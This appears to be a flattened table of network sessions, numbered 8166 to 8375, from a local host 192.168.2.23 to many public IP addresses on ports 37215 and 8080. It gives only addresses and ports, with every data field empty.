                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8166192.168.2.2334818157.43.32.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8167192.168.2.235052641.16.19.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8168192.168.2.2347522183.247.34.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8169192.168.2.2357912158.203.218.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8170192.168.2.2336204157.95.40.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8171192.168.2.2336452189.86.137.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8172192.168.2.2355834197.35.202.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8173192.168.2.235648641.28.123.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8174192.168.2.234279253.62.26.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8175192.168.2.235376414.19.142.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8176192.168.2.2357182197.83.241.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8177192.168.2.2358194176.79.86.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8178192.168.2.2336510157.192.243.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8179192.168.2.2358550220.129.73.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8180192.168.2.235422241.130.55.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8181192.168.2.234047241.213.190.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8182192.168.2.2335078157.120.142.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8183192.168.2.2343068197.61.7.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8184192.168.2.2354256199.150.133.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8185192.168.2.2336120157.251.92.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8186192.168.2.233906241.181.61.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8187192.168.2.234044041.150.170.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8188192.168.2.234504641.222.20.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8189192.168.2.2342066197.234.124.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8190192.168.2.234715839.78.55.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8191192.168.2.2335560131.176.107.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192192.168.2.233866441.167.131.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8193192.168.2.233518441.25.249.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8194192.168.2.2338394157.183.23.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8195192.168.2.2342396197.7.126.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8196192.168.2.2343746157.144.108.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8197192.168.2.2352924197.238.83.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8198192.168.2.2333734157.133.229.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8199192.168.2.2343862157.157.208.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8200192.168.2.234913241.9.55.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8201192.168.2.2345620157.173.202.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8202192.168.2.2340420221.151.73.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8203192.168.2.235034279.233.168.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8204192.168.2.235387041.192.126.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8205192.168.2.2345584157.18.255.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8206192.168.2.2340468197.197.250.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8207192.168.2.2355218197.80.229.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8208192.168.2.2358512109.244.14.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8209192.168.2.2350172157.43.170.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8210192.168.2.2354486197.254.30.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8211192.168.2.2351334157.210.101.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8212192.168.2.235715241.132.13.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8213192.168.2.233952041.113.150.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8214192.168.2.233446641.221.56.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8215192.168.2.233415641.112.247.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8216192.168.2.2339112157.40.192.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8217192.168.2.235227272.94.64.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8218192.168.2.235092037.183.225.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8219192.168.2.233434241.202.57.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8220192.168.2.2339244157.119.218.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8221192.168.2.2343820197.226.65.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8222192.168.2.2339554198.215.37.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8223192.168.2.235106441.210.207.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8224192.168.2.234985441.152.119.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8225192.168.2.2346616134.23.106.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8226192.168.2.2356316197.213.103.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8227192.168.2.2357722157.113.173.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8228192.168.2.234341041.45.73.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8229192.168.2.2354622157.197.167.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8230192.168.2.235982841.169.98.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8231192.168.2.2349292130.52.94.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8232192.168.2.2355746157.160.45.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8233192.168.2.2337872197.242.214.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8234192.168.2.2350662197.119.170.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8235192.168.2.234923841.133.200.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8236192.168.2.2347272197.88.55.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8237192.168.2.2351570157.6.32.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8238192.168.2.2337004110.60.171.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8239192.168.2.235390841.226.59.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8240192.168.2.233370269.214.249.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8241192.168.2.234106641.55.116.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8242192.168.2.235846471.40.228.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8243192.168.2.2351950157.178.241.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8244192.168.2.2336002197.82.13.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8245192.168.2.2360890157.177.122.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8246192.168.2.2360188179.61.142.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8247192.168.2.233658041.33.26.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8248192.168.2.233438241.121.48.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8249192.168.2.235909441.16.109.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8250192.168.2.2354514197.183.201.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8251192.168.2.2359768208.163.51.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8252192.168.2.2337350209.103.152.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8253192.168.2.2359000131.85.43.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8254192.168.2.23489502.155.0.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8255192.168.2.2338534109.192.44.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8256192.168.2.2351382192.14.118.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8257192.168.2.235416874.177.173.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8258192.168.2.2339062168.8.218.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8259192.168.2.2333074130.13.13.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8260192.168.2.234798068.42.141.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8261192.168.2.23529528.243.186.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8262192.168.2.235104853.96.250.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8263192.168.2.2335632117.226.223.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8264192.168.2.235171827.55.59.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8265192.168.2.2336142119.141.136.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8266192.168.2.2356250115.115.192.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8267192.168.2.234678044.79.90.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8268192.168.2.235231896.233.193.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8269192.168.2.23548804.199.66.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8270192.168.2.2334020120.74.38.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8271192.168.2.2356992172.197.211.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8272192.168.2.234860645.203.23.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8273192.168.2.2343162174.195.141.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8274192.168.2.2341590177.201.251.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8275192.168.2.2337074172.221.156.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8276192.168.2.2344924190.245.163.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8277192.168.2.2358140219.124.241.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8278192.168.2.2353150130.16.45.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8279192.168.2.2348156109.7.47.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8280192.168.2.2344522204.160.115.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8281192.168.2.2341994101.210.174.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8282192.168.2.2346322161.33.168.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8283192.168.2.234047092.53.118.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8284192.168.2.2359480111.28.166.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8285192.168.2.233456092.183.52.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8286192.168.2.2346888203.24.27.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8287192.168.2.2339692142.154.24.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8288192.168.2.235055698.177.11.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8289192.168.2.2353928183.174.25.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8290192.168.2.233483076.93.16.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8291192.168.2.2348310122.104.197.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8292192.168.2.2335436156.19.232.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8293192.168.2.235605490.64.142.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8294192.168.2.2339890131.28.230.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8295192.168.2.233415236.61.216.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8296192.168.2.2333042169.183.74.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8297192.168.2.2357876157.175.88.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8298192.168.2.2344506144.74.35.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8299192.168.2.2340424135.180.222.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8300192.168.2.2356198162.97.53.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8301192.168.2.234102099.53.85.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8302192.168.2.2352654105.209.145.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8303192.168.2.233777847.105.252.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8304192.168.2.235624432.68.10.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8305192.168.2.2353126146.162.4.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8306192.168.2.235052452.65.118.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8307192.168.2.235791627.156.105.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8308192.168.2.2356454199.216.32.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8309192.168.2.2340406188.110.119.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8310192.168.2.234151827.229.245.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8311192.168.2.2353526136.110.68.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8312192.168.2.234980895.51.236.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8313192.168.2.2334900200.100.27.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8314192.168.2.2343780180.176.130.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8315192.168.2.2356762124.209.22.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8316192.168.2.2350290155.230.247.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8317192.168.2.235274499.0.225.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8318192.168.2.2348168163.140.228.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8319192.168.2.2340084143.56.216.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8320192.168.2.233716265.236.92.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8321192.168.2.2336744163.197.181.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8322192.168.2.234484287.171.139.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8323192.168.2.233438876.76.80.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8324192.168.2.2337226200.80.188.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8325192.168.2.2347904114.6.251.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8326192.168.2.2339404179.59.131.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8327192.168.2.2352390203.112.171.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8328192.168.2.2340040162.174.237.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8329192.168.2.234600024.115.222.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8330192.168.2.235713637.218.121.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8331192.168.2.2334980152.70.33.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8332192.168.2.2346156167.218.253.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8333192.168.2.23594445.181.68.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8334192.168.2.235776632.127.38.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8335192.168.2.2341124145.238.216.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8336192.168.2.2334398112.240.193.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8337192.168.2.2342250136.54.104.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8338192.168.2.2357624140.186.5.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8339192.168.2.235934832.36.120.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8340192.168.2.235115218.140.60.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8341192.168.2.2352164183.132.47.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8342192.168.2.235320475.84.162.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8343192.168.2.2350038107.108.42.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8344192.168.2.23391601.66.135.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8345192.168.2.2332842164.232.97.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8346192.168.2.233349078.172.168.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8347192.168.2.234087464.230.130.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8348192.168.2.234038078.224.191.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8349192.168.2.2347568133.48.115.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8350192.168.2.233958820.57.93.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8351192.168.2.234739638.255.167.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8352192.168.2.2344432193.98.55.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8353192.168.2.2342148176.196.160.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8354192.168.2.2341606168.68.110.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8355192.168.2.2344910108.121.245.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8356192.168.2.2340370220.162.189.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8357192.168.2.2351660114.95.77.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8358192.168.2.2338542139.249.161.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8359192.168.2.234110870.112.181.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8360192.168.2.233384848.192.236.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8361192.168.2.2355314200.121.232.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8362192.168.2.2352060144.137.231.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8363192.168.2.2336526198.72.45.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8364192.168.2.2358014213.140.213.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8365192.168.2.2356320183.58.55.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8366192.168.2.23487205.114.164.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8367192.168.2.2354142158.72.84.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8368192.168.2.2338350165.123.80.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8369192.168.2.2342704218.160.18.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8370192.168.2.2345986128.122.36.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8371192.168.2.2346792219.165.71.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8372192.168.2.2341394141.86.60.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8373192.168.2.2333220189.133.45.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8374192.168.2.235033865.245.76.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8375192.168.2.2354064184.155.164.448080
                                                        TimestampBytes transferredDirectionData


